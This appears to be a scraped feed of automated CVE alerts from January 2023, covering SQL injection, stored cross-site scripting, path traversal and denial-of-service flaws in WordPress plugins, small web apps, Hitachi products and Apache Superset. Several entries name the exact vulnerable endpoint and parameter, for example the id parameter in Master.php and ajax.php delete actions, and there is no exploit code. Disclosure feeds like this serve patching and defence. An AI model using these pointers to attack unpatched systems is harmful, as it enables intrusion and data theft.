🚨 CVE-2015-10040A vulnerability was found in gitlearn. It has been declared as problematic. This vulnerability affects the function getGrade/getOutOf of the file scripts/config.sh of the component Escape Sequence Handler. The manipulation leads to injection. The attack can be initiated remotely. The name of the patch is 3faa5deaa509012069afe75cd03c21bda5050a64. It is recommended to apply a patch to fix this issue. VDB-218302 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-17 16:29:59 |
🚨 CVE-2022-46946Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_brand.🎖@cveNotify |
|
| 2023-01-17 16:29:55 |
🚨 CVE-2022-46947Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_category.🎖@cveNotify |
|
| 2023-01-17 16:29:54 |
🚨 CVE-2022-46950Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_window.🎖@cveNotify |
|
| 2023-01-17 16:29:53 |
🚨 CVE-2022-46951Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_uploads.🎖@cveNotify |
|
| 2023-01-17 16:29:52 |
🚨 CVE-2022-46952Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_user.🎖@cveNotify |
|
| 2023-01-17 07:29:46 |
🚨 CVE-2022-34881Generation of Error Message Containing Sensitive Information vulnerability in Hitachi JP1/Automatic Operation allows local users to gain sensitive information. This issue affects JP1/Automatic Operation: from 10-00 through 10-54-03, from 11-00 before 11-51-09, from 12-00 before 12-60-01.🎖@cveNotify |
|
| 2023-01-17 07:29:45 |
🚨 CVE-2020-36605Incorrect Default Permissions vulnerability in Hitachi Infrastructure Analytics Advisor on Linux (Analytics probe component), Hitachi Ops Center Analyzer on Linux (Analyzer probe component), Hitachi Ops Center Viewpoint on Linux (Viewpoint RAID Agent component) allows local users to read and write specific files. This issue affects Hitachi Infrastructure Analytics Advisor: from 2.0.0-00 through 4.4.0-00; Hitachi Ops Center Analyzer: from 10.0.0-00 before 10.9.0-00; Hitachi Ops Center Viewpoint: from 10.8.0-00 before 10.9.0-00.🎖@cveNotify |
|
| 2023-01-17 07:29:44 |
🚨 CVE-2022-3191Insertion of Sensitive Information into Log File vulnerability in Hitachi Ops Center Analyzer on Linux (Virtual Strage Software Agent component) allows local users to gain sensitive information. This issue affects Hitachi Ops Center Analyzer: from 10.8.1-00 before 10.9.0-00🎖@cveNotify |
|
| 2023-01-17 07:29:42 |
🚨 CVE-2022-41552Server-Side Request Forgery (SSRF) vulnerability in Hitachi Infrastructure Analytics Advisor on Linux (Data Center Analytics, Analytics probe components), Hitachi Ops Center Analyzer on Linux (Hitachi Ops Center Analyzer detail view, Hitachi Ops Center Analyzer probe components) allows Server Side Request Forgery. This issue affects Hitachi Infrastructure Analytics Advisor: from 2.0.0-00 through 4.4.0-00; Hitachi Ops Center Analyzer: from 10.0.0-00 before 10.9.0-00.🎖@cveNotify |
|
| 2023-01-17 07:29:38 |
🚨 CVE-2022-41553Insertion of Sensitive Information into Temporary File vulnerability in Hitachi Infrastructure Analytics Advisor on Linux (Analytics probe component), Hitachi Ops Center Analyzer on Linux (Hitachi Ops Center Analyzer probe component) allows local users to gain sensitive information. This issue affects Hitachi Infrastructure Analytics Advisor: from 2.0.0-00 through 4.4.0-00; Hitachi Ops Center Analyzer: from 10.0.0-00 before 10.9.0-00.🎖@cveNotify |
|
| 2023-01-17 07:29:37 |
🚨 CVE-2022-45439A pair of spare WiFi credentials is stored in the configuration file of the Zyxel AX7501-B0 firmware prior to V5.17(ABPC.3)C0 in cleartext. An unauthenticated attacker could use the credentials to access the WLAN service if the configuration file has been retrieved from the device by leveraging another known vulnerability.🎖@cveNotify |
|
| 2023-01-17 07:29:36 |
🚨 CVE-2020-36611Incorrect Default Permissions vulnerability in Hitachi Tuning Manager on Linux (Hitachi Tuning Manager server, Hitachi Tuning Manager - Agent for RAID, Hitachi Tuning Manager - Agent for NAS, Hitachi Tuning Manager - Agent for SAN Switch components) allows local users to read and write specific files.This issue affects Hitachi Tuning Manager: before 8.8.5-00.🎖@cveNotify |
|
| 2023-01-17 02:29:35 |
🚨 CVE-2022-3087Fuji Electric Tellus Lite V-Simulator versions 4.0.12.0 and prior are vulnerable to an out-of-bounds write which may allow an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-01-16 21:29:36 |
🚨 CVE-2015-10057A vulnerability was found in Little Apps Little Software Stats. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file inc/class.securelogin.php of the component Password Reset Handler. The manipulation leads to improper access controls. Upgrading to version 0.2 is able to address this issue. The name of the patch is 07ba8273a9311d1383f3686ac7cb32f20770ab1e. It is recommended to upgrade the affected component. The identifier VDB-218401 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-16 21:29:35 |
🚨 CVE-2022-47630Trusted Firmware-A through 2.8 has an out-of-bounds read in the X.509 parser for parsing boot certificates. This affects downstream use of get_ext and auth_nvctr. Attackers might be able to trigger dangerous read side effects or obtain sensitive information about microarchitectural state.🎖@cveNotify |
|
| 2023-01-16 20:29:37 |
🚨 CVE-2014-125080A vulnerability has been found in frontaccounting faplanet and classified as critical. This vulnerability affects unknown code. The manipulation leads to path traversal. The name of the patch is a5dcd87f46080a624b1a9ad4b0dd035bbd24ac50. It is recommended to apply a patch to fix this issue. VDB-218398 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-16 20:29:36 |
🚨 CVE-2015-10055A vulnerability was found in PictureThisWebServer and classified as critical. This issue affects the function router.post of the file routes/user.js. The manipulation of the argument username/password leads to sql injection. The name of the patch is 68b9dc346e88b494df00d88c7d058e96820e1479. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218399.🎖@cveNotify |
|
| 2023-01-16 18:30:09 |
🚨 CVE-2022-4483The Insert Pages WordPress plugin before 3.7.5 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-16 18:30:06 |
🚨 CVE-2022-4484The Social Share, Social Login and Social Comments Plugin WordPress plugin before 7.13.44 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-16 18:30:04 |
🚨 CVE-2022-4486The Meteor Slides WordPress plugin through 1.5.6 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-16 18:30:02 |
🚨 CVE-2022-4487The Easy Accordion WordPress plugin before 2.2.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-16 18:30:01 |
🚨 CVE-2022-4507The Real Cookie Banner WordPress plugin before 3.4.10 does not validate and escapes some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as a contributor to perform Stored Cross-Site Scripting attacks against logged-in admins.🎖@cveNotify |
|
| 2023-01-16 18:29:59 |
🚨 CVE-2022-4508The ConvertKit WordPress plugin before 2.0.5 does not validate and escapes some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as a contributor to perform Stored Cross-Site Scripting attacks, which could be used against high-privilege users such as admins.🎖@cveNotify |
|
| 2023-01-16 18:29:57 |
🚨 CVE-2022-4544The MashShare WordPress plugin before 3.8.7 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-16 18:29:56 |
🚨 CVE-2022-4547The Conditional Payment Methods for WooCommerce WordPress plugin through 1.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by [high privilege users such as admin|users with a role as low as admin.🎖@cveNotify |
|
| 2023-01-16 18:29:53 |
🚨 CVE-2022-4549The Tickera WordPress plugin before 3.5.1.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.🎖@cveNotify |
|
| 2023-01-16 18:29:52 |
🚨 CVE-2022-4571The Seriously Simple Podcasting WordPress plugin before 2.19.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-16 18:29:50 |
🚨 CVE-2022-4578The Video Conferencing with Zoom WordPress plugin before 4.0.10 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-16 18:29:48 |
🚨 CVE-2022-4648The Real Testimonials WordPress plugin before 2.6.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-16 18:29:47 |
🚨 CVE-2022-4653The Greenshift WordPress plugin before 4.8.9 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.🎖@cveNotify |
|
| 2023-01-16 18:29:46 |
🚨 CVE-2022-4655The Welcart e-Commerce WordPress plugin before 2.8.9 does not validate and escapes one of its shortcode attributes, which could allow users with a role as low as a contributor to perform a Stored Cross-Site Scripting attack.🎖@cveNotify |
|
| 2023-01-16 18:29:44 |
🚨 CVE-2022-4658The RSSImport WordPress plugin through 4.6.1 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.🎖@cveNotify |
|
| 2023-01-16 18:29:42 |
🚨 CVE-2022-2658The WP Spell Check WordPress plugin before 9.13 does not escape ignored words, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-01-16 18:29:40 |
🚨 CVE-2022-47630Trusted Firmware-A through 2.8 has an out-of-bounds read in the X.509 parser for parsing boot certificates. This affects downstream use of get_ext and auth_nvctr. Attackers might be able to trigger dangerous read side effects or obtain sensitive information about microarchitectural state.🎖@cveNotify |
|
| 2023-01-16 18:29:39 |
🚨 CVE-2022-4060The User Post Gallery WordPress plugin through 2.19 does not limit what callback functions can be called by users, making it possible to any visitors to run code on sites running it.🎖@cveNotify |
|
| 2023-01-16 18:29:38 |
🚨 CVE-2022-4101The Images Optimize and Upload CF7 WordPress plugin through 2.1.4 does not validate the file to be deleted via an AJAX action available to unauthenticated users, which could allow them to delete arbitrary files on the server via path traversal attack.🎖@cveNotify |
|
| 2023-01-16 18:29:37 |
🚨 CVE-2022-4199The Link Library WordPress plugin before 7.4.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-01-16 16:29:35 |
🚨 CVE-2022-4890A vulnerability, which was classified as critical, has been found in abhilash1985 PredictApp. This issue affects some unknown processing of the file config/initializers/new_framework_defaults_7_0.rb of the component Cookie Handler. The manipulation leads to deserialization. The attack may be initiated remotely. The name of the patch is b067372f3ee26fe1b657121f0f41883ff4461a06. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218387.🎖@cveNotify |
|
| 2023-01-16 14:29:54 |
🚨 CVE-2015-10053A vulnerability classified as critical has been found in prodigasistemas curupira up to 0.1.3. Affected is an unknown function of the file app/controllers/curupira/passwords_controller.rb. The manipulation leads to sql injection. Upgrading to version 0.1.4 is able to address this issue. The name of the patch is 93a9a77896bb66c949acb8e64bceafc74bc8c271. It is recommended to upgrade the affected component. VDB-218394 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-16 14:29:53 |
🚨 CVE-2018-25076A vulnerability classified as critical was found in Events Extension. Affected by this vulnerability is the function getRandomFeaturedEventByDate/getUpcomingFeaturedEventsInCategoriesWithSubcategories/recacheEvent/searchResults of the file classes/events.php. The manipulation leads to sql injection. The name of the patch is 11169e48ab1249109485fdb1e0c9fca3d25ba01d. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218395.🎖@cveNotify |
|
| 2023-01-16 14:29:52 |
🚨 CVE-2021-4313A vulnerability was found in NethServer phonenehome. It has been rated as critical. This issue affects the function get_info/get_country_coor of the file server/index.php. The manipulation leads to sql injection. The name of the patch is 759c30b0ddd7d493836bbdf695cf71624b377391. It is recommended to apply a patch to fix this issue. The identifier VDB-218393 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-16 14:29:51 |
🚨 CVE-2010-10005A vulnerability was found in msmania poodim. It has been declared as critical. This vulnerability affects unknown code of the component Command Line Argument Handler. The manipulation leads to stack-based buffer overflow. The attack can be initiated remotely. The name of the patch is 6340d5d2c81e55e61522c4b40a6cdd5c39738cc6. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218392.🎖@cveNotify |
|
| 2023-01-16 14:29:50 |
🚨 CVE-2013-10012A vulnerability, which was classified as critical, was found in antonbolling clan7ups. Affected is an unknown function of the component Login/Session. The manipulation leads to sql injection. The name of the patch is 25afad571c488291033958d845830ba0a1710764. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218388.🎖@cveNotify |
|
| 2023-01-16 14:29:48 |
🚨 CVE-2016-15020A vulnerability was found in liftkit database up to 2.13.1. It has been classified as critical. This affects the function processOrderBy of the file src/Query/Query.php. The manipulation leads to sql injection. Upgrading to version 2.13.2 is able to address this issue. The name of the patch is 42ec8f2b22e0b0b98fb5b4444ed451c1b21d125a. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-218391.🎖@cveNotify |
|
| 2023-01-16 14:29:47 |
🚨 CVE-2022-41703A vulnerability in the SQL Alchemy connector of Apache Superset allows an authenticated user with read access to a specific database to add subqueries to the WHERE and HAVING fields referencing tables on the same database that the user should not have access to, despite the user having the feature flag "ALLOW_ADHOC_SUBQUERY" disabled (default value). This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.🎖@cveNotify |
|
| 2023-01-16 14:29:46 |
🚨 CVE-2022-43717Dashboard rendering does not sufficiently sanitize the content of markdown components leading to possible XSS attack vectors that can be performed by authenticated users with create dashboard permissions. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.🎖@cveNotify |
|
| 2023-01-16 14:29:45 |
🚨 CVE-2022-43718Upload data forms do not correctly render user input leading to possible XSS attack vectors that can be performed by authenticated users with database connection update permissions. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.🎖@cveNotify |
|
| 2023-01-16 14:29:44 |
🚨 CVE-2022-43719Two legacy REST API endpoints for approval and request access are vulnerable to cross site request forgery. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.🎖@cveNotify |
|
| 2023-01-16 14:29:43 |
🚨 CVE-2022-43720An authenticated attacker with write CSS template permissions can create a record with specific HTML tags that will not get properly escaped by the toast message displayed when a user deletes that specific CSS template record. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.🎖@cveNotify |
|
| 2023-01-16 14:29:41 |
🚨 CVE-2022-43721An authenticated attacker with update datasets permission could change a dataset link to an untrusted site, users could be redirected to this site when clicking on that specific dataset. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.🎖@cveNotify |
|
| 2023-01-16 14:29:39 |
🚨 CVE-2022-45438When explicitly enabling the feature flag DASHBOARD_CACHE (disabled by default), the system allowed for an unauthenticated user to access dashboard configuration metadata using a REST API Get endpoint. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.🎖@cveNotify |
|
| 2023-01-16 14:29:38 |
🚨 CVE-2022-45787Unproper laxist permissions on the temporary files used by MIME4J TempFileStorageProvider may lead to information disclosure to other local users. This issue affects Apache James MIME4J version 0.8.8 and prior versions. We recommend users to upgrade to MIME4j version 0.8.9 or later.🎖@cveNotify |
|
| 2023-01-16 14:29:37 |
🚨 CVE-2022-45935Usage of temporary files with insecure permissions by the Apache James server allows an attacker with local access to access private user data in transit. Vulnerable components includes the SMTP stack and IMAP APPEND command. This issue affects Apache James server version 3.7.2 and prior versions.🎖@cveNotify |
|
| 2023-01-16 11:29:36 |
🚨 CVE-2022-4258In multiple versions of HIMA PC based Software an unquoted Windows search path vulnerability might allow local users to gain privileges via a malicious .exe file and gain full access to the system.🎖@cveNotify |
|
| 2023-01-16 07:29:39 |
🚨 CVE-2023-0315Command Injection in GitHub repository froxlor/froxlor prior to 2.0.8.🎖@cveNotify |
|
| 2023-01-16 07:29:37 |
🚨 CVE-2023-0316Path Traversal: '\..\filename' in GitHub repository froxlor/froxlor prior to 2.0.0.🎖@cveNotify |
|
| 2023-01-16 00:30:04 |
🚨 CVE-2023-21539Windows Authentication Remote Code Execution Vulnerability.🎖@cveNotify |
|
| 2023-01-16 00:30:03 |
🚨 CVE-2023-21541Windows Task Scheduler Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-01-16 00:30:01 |
🚨 CVE-2023-21542Windows Installer Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-01-16 00:29:58 |
🚨 CVE-2023-0306Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.10.🎖@cveNotify |
|
| 2023-01-16 00:29:57 |
🚨 CVE-2023-0308Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.10.🎖@cveNotify |
|
| 2023-01-16 00:29:56 |
🚨 CVE-2023-0309Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.10.🎖@cveNotify |
|
| 2023-01-16 00:29:51 |
🚨 CVE-2023-0310Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.10.🎖@cveNotify |
|
| 2023-01-16 00:29:50 |
🚨 CVE-2023-0311Improper Authentication in GitHub repository thorsten/phpmyfaq prior to 3.1.10.🎖@cveNotify |
|
| 2023-01-16 00:29:49 |
🚨 CVE-2023-0312Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.10.🎖@cveNotify |
|
| 2023-01-16 00:29:48 |
🚨 CVE-2023-0314Cross-site Scripting (XSS) - Reflected in GitHub repository thorsten/phpmyfaq prior to 3.1.10.🎖@cveNotify |
|
| 2023-01-15 22:29:41 |
🚨 CVE-2023-23595BlueCat Device Registration Portal 2.2 allows XXE attacks that exfiltrate single-line files. A single-line file might contain credentials, such as "machine example.com login daniel password qwerty" in the documentation example for the .netrc file format. NOTE: 2.x versions are no longer supported. There is no available information about whether any later version is affected.🎖@cveNotify |
|
| 2023-01-15 22:29:40 |
🚨 CVE-2016-15018A vulnerability was found in krail-jpa up to 0.9.1. It has been classified as critical. This affects an unknown part. The manipulation leads to sql injection. Upgrading to version 0.9.2 is able to address this issue. The name of the patch is c1e848665492e21ef6cc9be443205e36b9a1f6be. It is recommended to upgrade the affected component. The identifier VDB-218373 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-15 22:29:39 |
🚨 CVE-2016-15019A vulnerability was found in tombh jekbox. It has been rated as problematic. This issue affects some unknown processing of the file lib/server.rb. The manipulation leads to exposure of information through directory listing. The attack may be initiated remotely. The name of the patch is 64eb2677671018fc08b96718b81e3dbc83693190. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218375.🎖@cveNotify |
|
| 2023-01-15 20:29:50 |
🚨 CVE-2015-10049A vulnerability was found in Overdrive Eletrônica course-builder up to 1.7.x and classified as problematic. Affected by this issue is some unknown functionality of the file coursebuilder/modules/oeditor/oeditor.html. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.8.0 is able to address this issue. The name of the patch is e39645fd714adb7e549908780235911ae282b21b. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218372.🎖@cveNotify |
|
| 2023-01-15 20:29:49 |
🚨 CVE-2015-10050A vulnerability was found in brandonfire miRNA_Database_by_PHP_MySql. It has been declared as critical. This vulnerability affects the function __construct/select_single_rna/count_rna of the file inc/model.php. The manipulation leads to sql injection. The name of the patch is 307c5d510841e6142ddcbbdbb93d0e8a0dc3fd6a. It is recommended to apply a patch to fix this issue. VDB-218374 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-15 20:29:47 |
🚨 CVE-2015-10051A vulnerability, which was classified as critical, has been found in bony2023 Discussion-Board. Affected by this issue is the function display_all_replies of the file functions/main.php. The manipulation of the argument str leads to sql injection. The name of the patch is 26439bc4c63632d63ba89ebc0f149b25a9010361. It is recommended to apply a patch to fix this issue. VDB-218378 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-15 20:29:46 |
🚨 CVE-2022-3517A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.🎖@cveNotify |
|
| 2023-01-15 13:29:59 |
🚨 CVE-2023-0303A vulnerability was found in SourceCodester Online Food Ordering System. It has been rated as critical. Affected by this issue is some unknown functionality of the file view_prod.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-218384.🎖@cveNotify |
|
| 2023-01-15 13:29:56 |
🚨 CVE-2023-0304A vulnerability classified as critical has been found in SourceCodester Online Food Ordering System. This affects an unknown part of the file admin_class.php of the component Signup Module. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-218385 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-15 13:29:52 |
🚨 CVE-2023-0305A vulnerability classified as critical was found in SourceCodester Online Food Ordering System. This vulnerability affects unknown code of the file admin_class.php of the component Login Module. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-218386 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-15 12:29:50 |
🚨 CVE-2015-10044A vulnerability classified as critical was found in gophergala sqldump. This vulnerability affects unknown code. The manipulation leads to sql injection. The name of the patch is 76db54e9073b5248b8863e71a63d66a32d567d21. It is recommended to apply a patch to fix this issue. VDB-218350 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-15 12:29:49 |
🚨 CVE-2015-10045A vulnerability, which was classified as critical, was found in tutrantta project_todolist. Affected is the function getAffectedRows/where/insert/update in the library library/Database.php. The manipulation leads to sql injection. The name of the patch is 194a0411bbe11aa4813f13c66b9e8ea403539141. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218352.🎖@cveNotify |
|
| 2023-01-15 12:29:48 |
🚨 CVE-2015-10047A vulnerability was found in KYUUBl school-register. It has been classified as critical. This affects an unknown part of the file src/DBManager.java. The manipulation leads to sql injection. The name of the patch is 1cf7e01b878aee923f2b22cc2535c71a680e4c30. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218355.🎖@cveNotify |
|
| 2023-01-15 12:29:47 |
🚨 CVE-2015-10048A vulnerability was found in bmattoso desafio_buzz_woody. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. The name of the patch is cb8220cbae06082c969b1776fcb2fdafb3a1006b. It is recommended to apply a patch to fix this issue. The identifier VDB-218357 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-15 12:29:43 |
🚨 CVE-2014-125078A vulnerability was found in yanheven console and classified as problematic. Affected by this issue is some unknown functionality of the file horizon/static/horizon/js/horizon.instances.js. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the patch is 32a7b713468161282f2ea01d5e2faff980d924cd. It is recommended to apply a patch to fix this issue. VDB-218354 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-15 12:29:42 |
🚨 CVE-2014-125079A vulnerability was found in agy pontifex.http. It has been declared as critical. This vulnerability affects unknown code of the file lib/Http.coffee. The manipulation leads to sql injection. Upgrading to version 0.1.0 is able to address this issue. The name of the patch is e52a758f96861dcef2dabfecb9da191bb2e07761. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218356.🎖@cveNotify |
|
| 2023-01-15 12:29:41 |
🚨 CVE-2022-4889A vulnerability classified as critical was found in visegripped Stracker. Affected by this vulnerability is the function getHistory of the file doc_root/public_html/stracker/api.php. The manipulation of the argument symbol/startDate/endDate leads to sql injection. The name of the patch is 63e1b040373ee5b6c7d1e165ecf5ae1603d29e0a. It is recommended to apply a patch to fix this issue. The identifier VDB-218377 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-15 12:29:40 |
🚨 CVE-2023-23595BlueCat Device Registration Portal 2.2 allows XXE attacks that exfiltrate single-line files. A single-line file might contain credentials, such as "machine example.com login daniel password qwerty" in the documentation example for the .netrc file format. NOTE; 2.x versions are no longer supported. There is no available information about whether any later version is affected.🎖@cveNotify |
|
| 2023-01-15 07:29:43 |
🚨 CVE-2023-23590Mercedes-Benz XENTRY Retail Data Storage 7.8.1 allows remote attackers to cause a denial of service (device restart) via an unauthenticated API request. The attacker must be on the same network as the device.🎖@cveNotify |
|
| 2023-01-15 07:29:42 |
🚨 CVE-2022-44793handle_ipv6IpForwarding in agent/mibgroup/ip-mib/ip_scalars.c in Net-SNMP 5.4.3 through 5.9.3 has a NULL Pointer Exception bug that can be used by a remote attacker to cause the instance to crash via a crafted UDP packet, resulting in Denial of Service.🎖@cveNotify |
|
| 2023-01-15 07:29:41 |
🚨 CVE-2022-4379A use-after-free vulnerability was found in __nfs42_ssc_open() in fs/nfs/nfs4file.c in the Linux kernel. This flaw allows an attacker to conduct a remote denial🎖@cveNotify |
|
| 2023-01-15 07:29:40 |
🚨 CVE-2023-0302Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) in GitHub repository radareorg/radare2 prior to 5.8.2.🎖@cveNotify |
|
| 2023-01-15 00:29:44 |
🚨 CVE-2016-15017A vulnerability has been found in fabarea media_upload and classified as critical. This vulnerability affects the function getUploadedFileList of the file Classes/Service/UploadFileService.php. The manipulation leads to pathname traversal. Upgrading to version 0.9.0 is able to address this issue. The name of the patch is b25d42a4981072321c1a363311d8ea2a4ac8763a. It is recommended to upgrade the affected component. VDB-217786 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-15 00:29:43 |
🚨 CVE-2022-4711The Royal Elementor Addons plugin for WordPress is vulnerable to insufficient access control in the 'wpr_save_mega_menu_settings' AJAX action in versions up to, and including, 1.3.59. This allows any authenticated user, including those with subscriber-level permissions, to enable and modify Mega Menu settings for any menu item.🎖@cveNotify |
|
| 2023-01-15 00:29:41 |
🚨 CVE-2015-10043A vulnerability, which was classified as critical, was found in abreen Apollo. This affects an unknown part. The manipulation of the argument file leads to path traversal. The name of the patch is 6206406630780bbd074aff34f4683fb764faba71. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218307.🎖@cveNotify |
|
| 2023-01-14 22:29:41 |
🚨 CVE-2017-20167A vulnerability, which was classified as problematic, was found in Minichan. This affects an unknown part of the file reports.php. The manipulation of the argument headline leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is fc0e732e58630cba318d6bf49d1388a7aa9d390e. It is recommended to apply a patch to fix this issue. The identifier VDB-217785 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-14 20:29:43 |
🚨 CVE-2023-0300Cross-site Scripting (XSS) - Reflected in GitHub repository alfio-event/alf.io prior to 2.0-M4-2301.🎖@cveNotify |
|
| 2023-01-14 20:29:42 |
🚨 CVE-2023-0301Cross-site Scripting (XSS) - Stored in GitHub repository alfio-event/alf.io prior to Alf.io 2.0-M4-2301.🎖@cveNotify |
|
| 2023-01-14 20:29:41 |
🚨 CVE-2022-22728A flaw in Apache libapreq2 versions 2.16 and earlier could cause a buffer overflow while processing multipart form uploads. A remote attacker could send a request causing a process crash which could lead to a denial of service attack.🎖@cveNotify |
|
| 2023-01-14 18:29:55 |
🚨 CVE-2023-0299Improper Input Validation in GitHub repository publify/publify prior to 9.2.10.🎖@cveNotify |
|
| 2023-01-14 15:29:42 |
🚨 CVE-2022-1812Integer Overflow or Wraparound in GitHub repository publify/publify prior to 9.2.10.🎖@cveNotify |
|
| 2023-01-14 15:29:41 |
🚨 CVE-2022-2815Insecure Storage of Sensitive Information in GitHub repository publify/publify prior to 9.2.10.🎖@cveNotify |
|
| 2023-01-14 14:30:00 |
🚨 CVE-2022-38482A link-manipulation issue was discovered in Mega HOPEX 15.2.0.6110 before V5CP4.🎖@cveNotify |
|
| 2023-01-14 14:29:59 |
🚨 CVE-2022-45164An issue was discovered in Archibus Web Central 2022.03.01.107. A service exposed by the application allows a basic user to cancel (delete) a booking, created by someone else - even if this basic user is not a member of the booking🎖@cveNotify |
|
| 2023-01-14 14:29:58 |
🚨 CVE-2022-38393A denial of service vulnerability exists in the cfg_server cm_processConnDiagPktList opcode of Asus RT-AX82U 3.0.0.4.386_49674-ge182230 router's configuration service. A specially-crafted network packet can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability.🎖@cveNotify |
|
| 2023-01-14 14:29:57 |
🚨 CVE-2022-45166An issue was discovered in Archibus Web Central 2022.03.01.107. A service exposed by the application accepts a set of user-controlled parameters that are used to act on the data returned to the user. It allows a basic user to access data unrelated to their role.🎖@cveNotify |
|
| 2023-01-14 14:29:54 |
